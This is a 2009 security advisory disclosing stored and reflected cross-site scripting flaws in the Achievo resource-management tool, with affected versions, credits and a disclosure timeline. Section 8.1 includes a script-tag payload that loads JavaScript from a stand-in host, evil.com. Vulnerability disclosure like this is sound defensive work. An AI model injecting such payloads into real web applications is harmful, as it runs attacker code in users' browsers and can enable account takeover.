[BONSAI] XSS in Achievo - Customized XSS payload included

           Bonsai Information Security - Advisory

                   Multiple XSS in Achievo

1. *Advisory Information*

Title: Multiple XSS in Achievo
Advisory ID: BONSAI-2009-0101
Advisory URL: http://www.bonsai-sec.com/research/vulnerabilities/achievo-mu=
Date published: 2009-10-13
Vendors contacted: Achievo
Release mode: Coordinated release

2. *Vulnerability Information*

Class: Multiple Cross Site Scripting (XSS)
Remotely Exploitable: Yes
Locally Exploitable: Yes
CVE Name: CVE-2009-2733

3. *Software Description*

Achievo is a flexible web-based resource management tool for business
environments. Achievos resource management capabilities will enable
organizations to support their business processes in a simple, but effectiv=
manner [0].

4. *Vulnerability Description*

Cross-Site Scripting attacks are a type of injection problem, in which
malicious scripts are injected into the otherwise benign and trusted web si=
Cross-site scripting (XSS) attacks occur when an attacker uses a web
application to send malicious code, generally in the form of a browser side
script, to a different end user. Flaws that allow these attacks to succeed =
quite widespread and occur anywhere a web application uses input from a use=
in the output it generates without validating or encoding it.

For additional information, please read [1].

5. *Vulnerable packages*

Version <=3D 1.3.4

6. *Non-vulnerable packages*

Achievo developers informed us that all users should upgrade to the latest
version of Achievo, which fixes this vulnerability. More information to be
found here:

7. *Credits*

This vulnerability was discovered by Ryan Dewhurst ( ryan -at- bonsai-sec.c=
om ).

8. *Technical Description*

8.1 A Persistent Cross Site Scripting vulnerability was found in the tittl=
variable within the scheduler module. This is because the application does =
properly sanitise the users input. The vulnerability can be triggered by a =
submitting the following data within the scheduler title:

    <SCRIPT SRC=3D//evil.com/xss.js></SCRIPT>

Which will include the xss.js javascript file within the schedule. A javasc=
that exploits this issue and creates a new administrator user in the system=
be found in Bonsais blog [2].

8.2 A Reflected Cross Site Scripting vulnerability was found in the
atksearch[contractnumber], atksearch_AE_customer[customer] and
atksearchmode[contracttype] variables within the Organisation Contracts
administration page. This is because the application does not properly sani=
the users input. The vulnerability can be triggered by clicking on the
following URL:


9. *Report Timeline*

    - 2009-07-09:
	Vulnerabilities were identified.

    - 2009-08-08:
    Vendor contacted.

    - 2009-08-12:
    Vendor confirmed vulnerabilities.

    - 2009-08-14:
    Vendor sets possible release date of fixed version to Monday 12 Oct.

    - 2009-10-12:
    Vendor released fixed version.

    - 2009-10-13:
    The advisory BONSAI-2009-0101 is published.

10. *References*

[0] http://www.achievo.org/
[1] http://www.owasp.org/index.php/Cross_site_scripting
[2] http://www.bonsai-sec.com/blog/index.php/cross-site-scripting-payloads/

11. *About Bonsai*

Bonsai is a company involved in providing professional computer
information security services.
Currently a sound growth company, since its foundation in early 2009
in Buenos Aires, Argentina,
we are fully committed to quality service, and focused on our
customers real needs.

12. *Disclaimer*

The contents of this advisory are copyright (c) 2009 Bonsai
Information Security, and may be
distributed freely provided that no fee is charged for this
distribution and proper credit is